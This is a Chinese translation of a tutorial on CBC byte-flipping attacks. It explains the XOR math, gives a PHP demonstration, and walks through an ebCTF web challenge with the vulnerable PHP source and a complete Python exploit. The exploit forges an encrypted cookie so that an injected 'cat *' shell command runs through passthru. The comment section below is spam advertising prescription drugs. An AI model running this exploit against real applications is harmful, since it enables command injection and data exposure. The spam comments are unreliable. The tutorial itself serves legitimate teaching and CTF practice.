CBC字节翻转攻击-101Approach

0x00 译者前言

本文翻译自:http://resources.infosecinstitute.com/cbc-byte-flipping-attack-101-approach/

drops里的相关主题文章:使用CBC比特反转攻击绕过加密的会话令牌
缘起是糖果出的一道题,看到原文作者对这一问题阐述的较为详细,虽然时间有些久远,但翻译一下可与诸君学习一下思考问题的方法。

0x01 相关介绍

此攻击方法的精髓在于:通过损坏密文字节来改变明文字节。(注:借助CBC内部的模式)借由此可以绕过过滤器,或者改变用户权限提升至管理员,又或者改变应用程序预期明文以尽猥琐之事。

首先让我们看看CBC是如何工作的,(作者很懒所以)更多细节你可以看这里:wiki
在这里只是解释一下关于攻击必须要理解的部分。(即:一图胜千言)

加密过程
CBC字节翻转攻击-101Approach
Plaintext:待加密的数据。

IV:用于随机化加密的比特块,保证即使对相同明文多次加密,也可以得到不同的密文。

Key:被一些如AES的对称加密算法使用。

Ciphertext:加密后的数据。

在这里重要的一点是,CBC工作于一个固定长度的比特组,将其称之为块。在本文中,我们将使用包含16字节的块。

因为作者讨厌高数(和译者一样),所以作者造了一些自己的公式(方便记忆):
•Ciphertext-0 = Encrypt(Plaintext XOR IV)—只用于第一个组块
•Ciphertext-N= Encrypt(Plaintext XOR Ciphertext-N-1)—用于第二及剩下的组块

注意:正如你所见,前一块的密文用来产生后一块的密文。

Decryption Process
CBC字节翻转攻击-101Approach

•Plaintext-0 = Decrypt(Ciphertext) XOR IV—只用于第一个组块
•Plaintext-N= Decrypt(Ciphertext) XOR Ciphertext-N-1—用于第二及剩下的组块

注意:Ciphertext-N-1(密文-N-1)是用来产生下一块明文;这就是字节翻转攻击开始发挥作用的地方。如果我们改变Ciphertext-N-1(密文-N-1)的一个字节,然后与下一个解密后的组块异或,我们就可以得到一个不同的明文了!You got it?别担心,下面我们将看到一个详细的例子。与此同时,下面的这张图也可以很好地说明这种攻击:
CBC字节翻转攻击-101Approach

0x02 一个例子(CBC Blocks of 16 bytes)

比方说,我们有这样的明文序列:

a:2:{s:4:"name";s:6:"sdsdsd";s:8:"greeting";s:20:"echo 'Hello sdsdsd!'";}

我们的目标是将“s:6”当中的数字6转换成数字“7”。我们需要做的第一件事就是把明文分成16个字节的块:
•Block 1:a:2:{s:4:"name"; •Block 2:s:6:"sdsdsd";s:8 •Block 3::"greeting";s:20 •Block 4::"echo 'Hello sd •Block 5:sdsd!'";} 因此,我们的目标字符位于块2,这意味着我们需要改变块1的密文来改变第二块的明文。

有一条经验法则是(注:结合上面的说明图可以得到),你在密文中改变的字节,只会影响到在下一明文当中,具有相同偏移量的字节。所以我们目标的偏移量是2:
•[0] = s
•1 = :
•2 =6

因此我们要改变在第一个密文块当中,偏移量是2的字节。正如你在下面的代码当中看到的,在第2行我们得到了整个数据的密文,然后在第3行中,我们改变块1中偏移量为2的字节,最后我们再调用解密函数。
1.$v = "a:2:{s:4:"name";s:6:"sdsdsd";s:8:"greeting";s:20:"echo 'Hello sdsdsd!'";}";
2.$enc = @encrypt($v);
3.$enc[2] = chr(ord($enc[2]) ^ ord("6") ^ ord ("7"));
4.$b = @decrypt($enc);

运行这段代码后,我们可以将数字6变为7:
CBC字节翻转攻击-101Approach
但是我们在第3行中,是如何改变字节成为我们想要的值呢?

基于上述的解密过程,我们知道有,A = Decrypt(Ciphertext)与B = Ciphertext-N-1异或后最终得到C = 6。等价于:
A = B XOR C
最后,A XOR B XOR C等于0。有了这个公式,我们可以在XOR运算的末尾处设置我们自己的值,就像这样:

A XOR B XOR C XOR "7"会在块2的明文当中,偏移量为2的字节处得到7。

下面是相关原理实现的PHP源代码:

define('MY_AES_KEY', "abcdef0123456789"); function aes($data, $encrypt) { $aes = mcrypt_module_open(MCRYPT_RIJNDAEL_128, '', MCRYPT_MODE_CBC, ''); $iv = "1234567891234567"; mcrypt_generic_init($aes, MY_AES_KEY, $iv); return $encrypt ? mcrypt_generic($aes,$data) : mdecrypt_generic($aes,$data); } define('MY_MAC_LEN', 40); function encrypt($data) { return aes($data, true); } function decrypt($data) { $data = rtrim(aes($data, false), "\0"); return $data; } $v = "a:2:{s:4:\"name\";s:6:\"sdsdsd\";s:8:\"greeting\";s:20:\"echo 'Hello sdsdsd!'\";}"; echo "Plaintext before attack: $v\n"; $b = array(); $enc = array(); $enc = @encrypt($v); $enc[2] = chr(ord($enc[2]) ^ ord("6") ^ ord ("7")); $b = @decrypt($enc); echo "Plaintext AFTER attack : $b\n";
0x03 一个练习

光说不练假把式,接下来作者举了一个他参加过的CTF中的一道题目的例子(更多详情可以参阅最后的相关参考链接),然后阐述了他是怎样在最后几步中打破CBC的。

下面提供了这个练习当中很重要的一部分源码:
CBC字节翻转攻击-101Approach

name = 'X' + ';cat *;#a'

首先作者添加了一个字符"X",通过CBC翻转攻击将其替换成一个单引号,然后;cat *;命令将被执行,最后的#是用来注释,确保函数escapeshellarg()插入的单引号不会引起其他问题;因此我们的命令就被成功执行啦。

在计算好之前的密码块中,要被改变的字节的确切偏移量(51)后,作者通过下面的代码来注入单引号:

pos = 51; val = chr(ord('X') ^ ord("'") ^ ord(cookie[pos])) exploit = cookie[0:pos] + val + cookie[pos + 1:]

然后作者通过改变cookie(因为其具有全部的密文),得到以下结果:
CBC字节翻转攻击-101Approach
首先,因为我们改变了第一块,所以在第二块中,黄色标记的"X"被成功替换为单引号,它被认为是多余插入(绿色),导致在unserialize()处理数据时产生一个错误(红色),因此应用程序甚至都没有去尝试执行注入了。

如何完善

我们需要使我们的注入数据有效,那么我们在第一块中得到的额外数据,就不能在反序列化的过程中造成任何问题(unserialize())。一种方法是在我们的恶意命令中填充字母字符。因此我们尝试在注入字符串前后填充多个'z':

name = 'z'*17 + 'X' + ';cat *;#' + 'z'*16

在发送上述字符串后,unserialize()并没有报错,并且我们的shell命令成功执行!!!

0x04 相关参考

1.CRYPTO #2: http://blog.gdssecurity.com/labs/tag/crypto
2.http://codezen.fr/2013/08/05/ebctf-2013-web400-cryptoaescbchmac-write-up/
3.http://hardc0de.ru/2013/08/04/ebctf-web400/

0x05 附录代码

下面是上面练习当中的PHP源码及exp:

•PHP code:
ini_set('display_errors',1); error_reporting(E_ALL); define('MY_AES_KEY', "abcdef0123456789"); define('MY_HMAC_KEY',"1234567890123456" ); #define("FLAG","CENSORED"); function aes($data, $encrypt) { $aes = mcrypt_module_open(MCRYPT_RIJNDAEL_128, '', MCRYPT_MODE_CBC, ''); $iv = mcrypt_create_iv (mcrypt_enc_get_iv_size($aes), MCRYPT_RAND); $iv = "1234567891234567"; mcrypt_generic_init($aes, MY_AES_KEY, $iv); return $encrypt ? mcrypt_generic($aes, $data) : mdecrypt_generic($aes, $data); } define('MY_MAC_LEN', 40); function hmac($data) { return hash_hmac('sha1', data, MY_HMAC_KEY); } function encrypt($data) { return aes($data . hmac($data), true); } function decrypt($data) { $data = rtrim(aes($data, false), "\0"); $mac = substr($data, -MY_MAC_LEN); $data = substr($data, 0, -MY_MAC_LEN); return hmac($data) === $mac ? $data : null; } $settings = array(); if (@$_COOKIE['settings']) { echo @decrypt(base64_decode($_COOKIE['settings'])); $settings = unserialize(@decrypt(base64_decode($_COOKIE['settings']))); } if (@$_POST['name'] && is_string($_POST['name']) && strlen($_POST['name']) < 200) { $settings = array( 'name' => $_POST['name'], 'greeting' => ('echo ' . escapeshellarg("Hello {$_POST['name']}!")), ); setcookie('settings', base64_encode(@encrypt(serialize($settings)))); #setcookie('settings', serialize($settings)); } $d = array(); if (@$settings['greeting']) { passthru($settings['greeting']); else { echo "

\n";
echo "
What is your name?

\n";
echo "\n";
echo "\n";
echo "

 \n"; } ?> 
Exploit:
#!/usr/bin/python import requests import sys import urllib from base64 import b64decode as dec from base64 import b64encode as enc url = 'http://192.168.184.133/ebctf/mine.php' def Test(x): t = "echo 'Hello %s!'" % x s = 'a:2:{s:4:"name";s:%s:"%s";s:8:"greeting";s:%s:"%s";}%s' % (len(x),x,len(t),t, 'X'*40) for i in xrange(0,len(s),16): print s[i:i+16] print '\n' def Pwn(s): global url s = urllib.quote_plus(enc(s)) req = requests.get(url, cookies = {'settings' : s}).content # if req.find('works') != -1: print req # else: # print '[-] FAIL' def GetCookie(name): global url d = { 'name':name, 'submit':'Submit' } h = requests.post(url, data = d, headers = {'Content-Type' : 'application/x-www-form-urlencoded'}).headers if h.has_key('set-cookie'): h = dec(urllib.unquote_plus(h['set-cookie'][9:])) #h = urllib.unquote_plus(h['set-cookie'][9:]) #print h return h else: print '[-] ERROR' sys.exit(0) #a:2:{s:4:"name";s:10:"X;cat *;#a";s:8:"greeting";s:24:"echo 'Hello X;cat *;#a!'";} #a:2:{s:4:"name"; #s:10:"X;cat *;#a #";s:8:"greeting" #;s:24:"echo 'Hel #lo X;cat *;#a!'" #;} #a:2:{s:4:"name";s:42:"zzzzzzzzzzzzzzzzzX;cat *;#zzzzzzzzzzzzzzzz";s:8:"greeting";s:56:"echo 'Hello zzzzzzzzzzzzzzzzzX;cat *;#zzzzzzzzzzzzzzzz!'";} #a:2:{s:4:"name"; #s:42:"zzzzzzzzzz #zzzzzzzX;cat *;# #zzzzzzzzzzzzzzzz #";s:8:"greeting" #;s:56:"echo 'Hel #lo zzzzzzzzzzzzz #zzzzX;cat *;#zzz #zzzzzzzzzzzzz!'" #;} #exploit = 'X' + ';cat *;#a' #Test case first, unsuccess exploit = 'z'*17 + 'X' + ';cat *;#' + 'z' *16 # Test Success #exploit = "______________________________________________________; cat *;#" #Test(exploit) cookie = GetCookie(exploit) pos = 100; #test case success #pos = 51; #test case first, unsuccess val = chr(ord('X') ^ ord("'") ^ ord(cookie[pos])) exploit = cookie[0:pos] + val + cookie[pos + 1:] Pwn(exploit)

评论区

评论一下~


18+44=?

已有 77 条评论

Jessie
读者

Do you have any exams coming up? purchase estrace cream online "All the teenagers were all being co-operative, they were all being treated as potential witnesses and there was nothing whatsoever to indicate that they themselves were planning to travel to Syria."

Marco
读者

I'd like to apply for this job buy selegiline online uk Hope to see some Rosedalians and MQ fans there Marianne McGoldrick Driscoll.”

Wayne
读者

Three years discount detrol la "The leaders reiterated their condemnation of Russia'scontinued flagrant vioaltion of Ukraine's sovereignty andterritorial integrity, and agreed on the need for Russia to faceincreased costs for its actions," a White House statement said.

Renaldo
读者

I went to depakote level for bipolar disorder They were shortlisted from more than 5,000 nominees for the award that is considered the Nobel Prize of teaching

Ismael
读者

About a year coumadin online purchase Germany, the leading economic power, has given signs this week of softening its opposition to calls from Italy and France for more leeway to stimulate growth by government spending and the leaders may make statements on the issue on Saturday.

Marvin
读者

How many weeks' holiday a year are there? order compazine Cooder's incredibly atmospheric music helps make the film special but is also a treat to listen to just as an album of music.

Savannah
读者

I love the theatre ordering clozaril online The retirement housebuilder saw its completions rise 18 per cent last year to 776 units.

Jada
读者

Do you play any instruments? clarinex better than claritin The letter on the left was written during her captivity while a paper found in her room appears to be a list of goals.

Eddie
读者

I like watching TV novartis cataflam oral suspension A takeover of the 87 percent state-owned Areva by muchlarger power utility EDF - its main customer andanother state-backed group - is not part of any plan, thesources said, although closer ties are a possibility.

Willis
读者

I'd like to change some money buy capoten Ai-jen Poo, the executive director of National Domestic Workers Alliance, told NBC News she planned to use the grant to create a fellowship for domestic workers at her organisation in order to help them learn the policies that affect their work.

Jerrod
读者

How long have you lived here? azulfidine sulfasalazine Muir, 40, joins NBC "Nightly News" anchor Brian Williams and Scott Pelley of the "CBS Evening News" at one of the three jobs generally considered the pinnacle of American broadcast news

Blaine
读者

Sorry, I'm busy at the moment by safety and chep aricept Ahead of him, a man with a white bucket treads gingerly among the snowdrops which carpet the floor of this forest just waking from its winter hibernation

Wilmer
读者

Have you got any ? what is the medicine aricept used for Duran says she relied too heavily on public opinion when making her first college choice, so she took more of her own research into consideration when deciding where she would transfer to,including identifying programs that would allow her to complete a new major in a reasonable amount of time

Fletcher
读者

It's serious amaryl for diabetes The Chinese firm, which sold its first phone just over threeyears ago, has also been moving into other personal and homedevices that would be compatible with Xiaomi phones, helping itretain users.

Bryant
读者

Directory enquiries accutane The results of the review will be released later on Tuesday, but the Liberal Democrat minister in charge of the exercise, Danny Alexander, is expected to say that the number of submarines operated could be cut from four to two.

Kenton
读者

Thanks for calling buy azithromycin Indonesia is the biggest grower, importer and consumer of cloves, producing between 60,000 and 80,000 tonnes a year

Darrin
读者

I'm not working at the moment buy atenolol online Russia cut its domestic borrowing plan by half earlier thisyear, to about 435 billion roubles ($11.62 billion)

Casey
读者

What's the interest rate on this account? paxil cr generic equivalent Aphrodite's Child bandmate Vangelis, in a statement quoted by the BBC, said: "Demis my friend

Bruce
读者

Not available at the moment fluticasone ointment This way, the storage requirement can be met with your larger-sized computer hard drive

Kyle
读者

I work for a publishers can i order clomid online The Spacestation and iPad Mini Space Pack are available now starting at $149.95 and $199.95, respectively

回到顶部